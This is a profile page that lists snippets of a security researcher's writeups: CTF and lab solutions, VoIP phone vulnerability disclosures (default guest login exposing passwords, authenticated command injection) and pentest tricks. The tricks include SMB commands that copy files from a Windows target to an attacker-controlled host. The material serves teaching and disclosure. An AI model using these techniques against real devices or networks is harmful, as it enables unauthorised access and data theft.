Tahaa Farooq

@tahaafarooq

SM @ OffSec | お前はもう死んでいる

Joined on Jul 24, 2021

  • -- RICKROLL -- Description During a local CTF, there was a challenge that had a VoIP. I interacted with DLINK DPH-400SE running a firmware version of FRU 2.2.15.8. It's basically a VoIP phone and the vendor is DLINK In this writeup. I explain how I was able to uncover yet another vulnerability generally a weakness of the ID 200 : CWE-200, This weakness allowed me to login to the web portal of the device using default guest credentials and read all the SIP authenticated user passwords as well as the administrator's password. POC Log in to the portal using the credentials "guest:guest" Heading to the maintenance tab, we have the access feature which has an option to modify accounts accessing the devices:
     Like 1 Bookmark
  • Whether you are solving a machine/lab, or engaging in a penetration testing assessment there will be times where you are required to transfer a file, it can be from your host to the target's host (windows/linux) or vice versa. Here I share a few tricks on how you can transfer files from Windows Machine to your Kali host. Using SMB With impacket we can use the utility impacket-smbserver to start an SMB server and use it to transfer files from windows. On Kali Host impacket-smbserver test . -smb2support -username jojomojo -password jojomojo On Windows net use m: \\YOUR_KALI_IP\test /user:jojomojo jojomojo copy backup.zip m:\
     Like  Bookmark
  • image This starter course gets you up and running with CryptoHack. You'll learn to encode and decode data types that are commonly used in cryptography. Then you'll get comfortable with the XOR operation which is at the centre of symmetric cryptography. Finally, the course ends with some fun XOR puzzles to test what you've learned. In this writeup I shall cover my solutions to the problems that are available in this introductory course module. 1. Finding Flags Description Each challenge is designed to help introduce you to a new piece of cryptography. Solving a challenge will require you to find a "flag".
     Like 1 Bookmark
  • MySQL Logo MySQL is an open-source relational database management system (RBDMS) that uses structured query language (SQL) for accessing and managing data. It is one of the most common widely used RDBMS in the world. In this article, I will be writing about how you, as a penetration tester, can leverage access to a MySQL service to gain complete access to the server, read files from the server, and write files to the server. This is achieved by identifying common misconfigurations and settings and exploiting them to achieve the intended goal. Connecting to MySQL Since this is considered to be a scenario where you have intially already gained credentials that do login to MySQL as an example they might be in a .env file: DB_HOST=localhost
     Like 4 Bookmark
  • What is Solar-PuTTY? Solar-PuTTY is a standalone free terminal emulator and network file transfer tool based on the well-known PuTTY for Windows. You can download it here: Solar-Putty I have the version: I have been using solar-putty for a while now, below is a preview of how solar-putty actually looks like Basically it can hold sessions of the servers that you have access to and you don't need to re-enter the passwords!
     Like 4 Bookmark
  • This writeup contains the challenges that I authored and were hosted on finals and were categorized in Reverse Engineering! REVERSE ENGINEERING Easy : REbasic First looking at readable strings using rabin2 with the command: rabin2 -z rebasic We have some useful strings here, and also we can see that we have a string that is even more interesting saying : /tmp/flag.txt.
     Like 2 Bookmark
  • This is a writeup of the collection of challenges I have solved from cybertalents ranging from easy to advanced. NOTE : THIS WRITEUP CONTAIN SPOILERS LEVEL : BASIC Pure Luck Description (1/24) * (1/60) * (1/60) , flag format:flag{xxxxxxxxxxxxxxxxxxxxxxxxx} Link pure-luck.out Solution
     Like 4 Bookmark
  • Hello everybody reading this :), This is a writeup on how we solved some of the challenges hosted in Hackthebox Cyber Apocalypse CTF 2024 with the theme "Hacker Royale". The categories are ranging from Web, Misc, Reverse Engineering, PWN, Forensics and Cryptography. NOTE : The challenges were solved by me, and @alienX and the other's who were in the team :) Web Challenges Flag Command (Very Easy - 300 points) Description image provided the challenge description above, I spawn the docker instance and start solving this challenge!
     Like 2 Bookmark
  • Below is a writeup of my solution upon solving the reverse engineering category from picoCTF 2024. There was a total of 7 reverse engineering challenges. I could say they were pretty straight forward and interesting challenges. Let's dive into it! But there is a note from PicoCTF, but anyways all I hope they put it in the GYM sooner 😭 image Packer (100 Points) Description image Solution Provided with an executable, the first thing I check is to see if the binary is packed as the challenge name hints:
     Like  Bookmark
  • A lil' Bit About It This is something that I challenged my self to do, I had a TECNO Camon X CA7 Model, which is a smart phone and basically in all TECNO smart phone models, there is a feature that allows the user to hide images. I had to hide in some of the images and then I set a pin that I shall use to unlock the vault for hiding my images. A question flew into my mind "What If I dont know the pin??" Then I dared my self to take this challenge to research on this petty feature! Let The Fun Begin As seen, it asks for a pin, so as we can preview what's in the hidden album. We can either bruteforce manually to get the pin since it's a 4 digits pin which will obviously be time consuming, but worth it eventually. Or we can decide to know where the image is then saved to after being sent to the hidden album. Connecting the smartphone to my laptop, and enabling the transfer of files, will allow me to view all folders in the system.
     Like 2 Bookmark
  • Scanning & Enumeration Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-27 02:47 EDT Nmap scan report for 10.10.10.175 Host is up (0.15s latency). Not shown: 990 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 |_http-server-header: Microsoft-IIS/10.0 | http-methods:
     Like 2 Bookmark
  • Do you love hacking Phones? well of course VOIP phones , this should be worth a read! Just unconvered a vulnerability that existed in Yealink SIP-TXXX, This vulnerability leads to RCE , but it's Authenticated meaning you must be logged in to the web interface! Proof Of Concept After logging in to the web interface which by any chance can be port 80 or port 443 , there is a Network tab clicking on it , there are 5 sections Basic,PC Port,NAT,Advanced,and Diagnostics, Clicking on Diagnostics: and there we can ping or perform traceroute command upon an IP address , capturing that request with burpsuite will reveal how the whole thing should look and how the parameters are sent with their values; POST /servlet?m=mod_data&p=network-diagnosis&q=docmd&Rajax=0.890925468511929 HTTP/1.1
     Like 2 Bookmark
  • CyberTalents Kids is a gamified cyber security platform allowing students especially of the age below 18 to be able to learn , practice , compete and engage in cybersecurity activities based on realistic examples and CTF-like. This goes about how I solved the challenges hosted in each category from this platform, categories available are : Web Security , Malware Reverse Engineering, Cryptography , Digital Forensics, Network security , Open Source Intelligency, Bash, and General Information, but I wont do General Information. Malware Reverse Engineering Getting Started Description: The correct input is the flag, format flag{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx} Given a binary file that we have to reverse and get the flag from.
     Like 1 Bookmark
  • This was a CTF hosted by Cybertalents to the scholarship students who are taking the web security course , and I happen to be among the students taking the course, the CTF was a jeopardy-styled and participants were to only participate as individuals and not as a team, The challenge that took me most of my time spent on and I love alot from this CTF is the Notes, most of the other challenges were easy except for Notes and Grocery Bot. The Scoreboard at the time I was doing this writeup: myrank First Challenge: one click (general information) Description: Type of malicious exploit of a website where unauthorized commands are submitted from a user that the web application trusts . This was an easy one , right of the bat the answer was CSRF.
     Like 2 Bookmark
  • This was a category which required users to use there OSINT skills to get the flags , and I'll be writing a writeup of how each challenge was solved! Winged Companion This challenge was made by thecybersamurai , the description was: My name is derived from a mythical winged greek creature. I have the ability to infiltrate your device and have access to your SMS, Emails , Whatsapp, Photos And Videos, GPS Data , Activate Microphone, Record calls, Calendar and Contact Books, Who Am I?? first we break down the keywords mythical - winged - greek creature that brings us to pegasus if you google that , and then pegasus is a spyware hehehe , So the flag was : h4k-it{pegasus}
     Like  Bookmark
  • I am among the organizers of this CTF and CTF author , In this writeup I'll be showing and explaining solving the two of the machines I made namely ; white and get leet 2 where White was a linux Ubuntu based Box and Get-Leet-2 was a Windows Based Box, Starting up with White which was the Linux! WHITE I'm just gonna go ahead fast with this LOL, we have port 80 and 22 open , checking on port 80 we have the apache page, So running gobuster with wordlist SecLists/Fuzzing/fuzz-Bo0om.txt and you get /secret/ which has index.php which is a rabbit hole so dirsearching inside the dir we find index.txt which carries credentials for a user named marce with password marce@2021, I now use the creds found to login with SSH to the machine, and we are in, Checking for user privileges : marce@white:~$ sudo -l Matching Defaults entries for marce on white.fqwkjfhbenledfj4uincv222dc.bx.internal.cloudapp.net: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
     Like  Bookmark
  • This room is made with challenges aimed to learning more on static analysis, the challenges are Windows executables , yeah scary , but luckily, you don't need a windows machine to solve this room ; it has 3 challenges namely strings1 , strings2, and strings3! I'll be using Ghidra , and Cutter for all of these challenges! String 1 Description: This executable prints an MD5 Hash on the screen when executed. Can you grab the exact flag? Note: You don't need to run the executable!
     Like  Bookmark
  • Enumeration First run up Nmap and got two ports open , that is port 80 and port 8080 , and I answer the question, asking about ports. # Nmap 7.92 scan initiated Sat Feb 12 22:32:01 2022 as: nmap -A -oN nmap-scan 10.10.112.90 Nmap scan report for 10.10.112.90 Host is up (0.36s latency). Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu)
     Like 2 Bookmark
  • Enumeration Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-07 14:17 E. Africa Standard Time Nmap scan report for 10.10.170.149 Host is up (0.35s latency). Not shown: 98 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http
     Like 2 Bookmark
  • Practice your skills in reversing and get the flag bypassing the login Given a file, that we need to reverse engineer to get the username so that we can then get the flag. This is literally easy and good for beginners like me:) Getting The Flag First before running it , I check the file type: ➜ classic_passwd file Challenge.Challenge Challenge.Challenge: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=b80ce38cb25d043128bc2c4e1e122c3d4fbba7f7, for GNU/Linux 3.2.0, not stripped
     Like 2 Bookmark